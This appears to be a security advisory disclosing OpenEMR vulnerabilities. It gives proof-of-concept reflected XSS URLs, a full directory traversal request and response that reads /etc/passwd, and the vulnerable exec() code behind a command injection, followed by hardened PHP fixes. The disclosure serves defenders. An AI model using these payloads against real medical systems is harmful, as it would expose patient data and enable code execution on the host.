Tenable researchers have discovered a number of flaws in OpenEMR - a popular, open-source medical records application. These flaws, detailed below, could allow attackers to obtain sensitive patient data or possibly execute arbitrary code on the host system.
XSS - controller.php - patient_id parameter - CVE-2019-3963
controller.php is vulnerable to a reflected cross-site scripting attack via the patient_id parameter. This could allow an attacker to execute arbitrary code in the context of the current user's session.
Proof of concept: http://<openemr host>/controller.php?document&clear_procedure_tag&patient_id=0"><script>alert("XSS")</script>&document_id=
XSS - controller.php - doc_id parameter - CVE-2019-3964
controller.php is vulnerable to a reflected cross-site scripting attack via the doc_id parameter. This could allow an attacker to execute arbitrary code in the context of the current user's session.
Proof of concept: http://<openemr host>/controller.php?document&view&patient_id=0&doc_id=0"><script>alert("XSS")</script>
XSS - controller.php - document_id parameter - CVE-2019-3965
controller.php is vulnerable to a reflected cross-site scripting attack via the document_id parameter. This could allow an attacker to execute arbitrary code in the context of the current user's session.
Proof of concept: http://<openemr host>/controller.php?document&clear_procedure_tag&patient_id=0&document_id=1"><script>alert("XSS")</script>
XSS - controller.php - foreign_id parameter - CVE-2019-3966
controller.php is vulnerable to a reflected cross-site scripting attack via the foreign_id parameter (POST request). This could allow an attacker to execute arbitrary code in the context of the current user's session.
Directory Traversal and Arbitrary File Download - Patient File Downloads - CVE-2019-3967
A vulnerability exists in the patient file download interface that allows authenticated users to download arbitrary files from the host system. This could allow an attacker to obtain sensitive patient information.
Proof of concept request:
POST /interface/patient_file/download_template.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:65.0) Gecko/20100101 Firefox/65.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http:
Content-Type: application/x-www-form-urlencoded
Content-Length: 70
Connection: close
Cookie: OpenEMR=ac4ac95557810d61c49af51436209596
Upgrade-Insecure-Requests: 1
patient_id=0&form_filename=../../../../../../../../../../../etc/passwd
Response:
HTTP/1.1 200 OK
Date: Tue, 16 Apr 2019 15:00:22 GMT
Server: Apache/2.4.34 (Unix)
Expires: 0
Cache-Control: must-revalidate, post-check=0, pre-check=0
Pragma: public
Content-Description: File Transfer
Content-Transfer-Encoding: binary
Content-Disposition: attachment; filename="passwd_Doe_2."
Content-Length: 1271
Connection: close
Content-Type: application/octet-stream
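A containment check for the form_filename value that download_template.php receives, written here as an added example (not OpenEMR's or Tenable's code); the template directory path and the form field names are assumptions.

```php
<?php
// Added example (not OpenEMR's code): containment check for the
// form_filename parameter of the patient file download interface.
// $templateDir is an assumed location; adjust to the real template path.
function resolve_download_path(string $templateDir, string $formFilename): ?string
{
    $base = realpath($templateDir);
    if ($base === false) {
        return null; // template directory missing: refuse rather than guess
    }
    // Templates are addressed by bare file name, so only a conservative
    // character set is accepted. "/" is not in it, which rejects "../"
    // sequences before the file system is consulted.
    if (!preg_match('/^[A-Za-z0-9._-]+$/', $formFilename)) {
        return null;
    }
    $candidate = realpath($base . DIRECTORY_SEPARATOR . $formFilename);
    if ($candidate === false || !is_file($candidate)) {
        return null; // no such template (".." alone also fails here)
    }
    // Defence in depth: realpath() follows symlinks, so a link placed
    // inside the directory that points at /etc/passwd would resolve
    // outside $base and is rejected by this prefix check.
    $prefix = $base . DIRECTORY_SEPARATOR;
    if (strncmp($candidate, $prefix, strlen($prefix)) !== 0) {
        return null;
    }
    return $candidate;
}

// Usage: only a path that survives every check is handed to readfile().
$templateDir = '/var/www/openemr/templates'; // assumed
$path = resolve_download_path($templateDir, $_POST['form_filename'] ?? '');
if ($path === null) {
    http_response_code(400);
    exit('invalid template name');
}
header('Content-Type: application/octet-stream');
header('Content-Disposition: attachment; filename="' . basename($path) . '"');
readfile($path);
```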
Command Injection via /contrib/forms/scanned_notes/new.php - CVE-2019-3968
Unlike other uses of "exec" / "system" / "passthru" / etc. in OpenEMR, this form does not properly escape commands sent to the host OS, which allows command injection by an authenticated user who has access to the scanned notes form. $formid is influenced directly by the user and passed directly into the commands executed later in the script. This could allow an attacker to inject arbitrary commands to be executed on the host system.
$formid = $_GET['id'];
...
$imagepath = "$imagedir/${encounter}_$formid.jpg";
^____ user controlled value
...
$cmd = "convert -density 96 '$tmp_name' '$imagepath'";
^____ Still contains user controlled value with no sanitization
...
$tmp0 = exec($cmd, $tmp1, $tmp2);
^___ command is executed
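The same conversion step rebuilt so that the id from the query string cannot reach the shell, as an added example that is not OpenEMR's or Tenable's code; the image directory, encounter value and upload field name are assumed placeholders.

```php
<?php
// Added example (not OpenEMR's code): hardened form of the scanned_notes
// image conversion. Directory, encounter and upload field are assumed.
function build_convert_command(string $imageDir, int $encounter, $rawId, string $tmpName): ?string
{
    // $_GET['id'] is a string under the requester's control. Accept only a
    // non-negative integer; anything else is refused before any command
    // string is assembled.
    $formid = filter_var($rawId, FILTER_VALIDATE_INT, ['options' => ['min_range' => 0]]);
    if ($formid === false) {
        return null;
    }
    // %d forces integer formatting, so the path can no longer carry
    // quotes or shell metacharacters taken from the request.
    $imagePath = sprintf('%s/%d_%d.jpg', $imageDir, $encounter, $formid);

    // escapeshellarg() single-quotes each argument and escapes embedded
    // quotes; the upload's temporary name is treated the same way because
    // it, too, originates outside this script.
    return 'convert -density 96 '
        . escapeshellarg($tmpName) . ' '
        . escapeshellarg($imagePath);
}

$imageDir  = '/var/www/openemr/sites/default/documents/scanned'; // assumed
$encounter = 42;                                                 // assumed
$cmd = build_convert_command(
    $imageDir,
    $encounter,
    $_GET['id'] ?? '',
    $_FILES['image']['tmp_name'] ?? ''                           // assumed field name
);
if ($cmd === null) {
    http_response_code(400);
    exit('invalid form id');
}
$tmp0 = exec($cmd, $tmp1, $tmp2);
if ($tmp2 !== 0) {
    error_log("convert failed with status $tmp2");
}
```

Validating $formid as an integer removes the injection point on its own; escapeshellarg() on every argument is the second layer, so a later change that interpolates another request value does not silently reopen it.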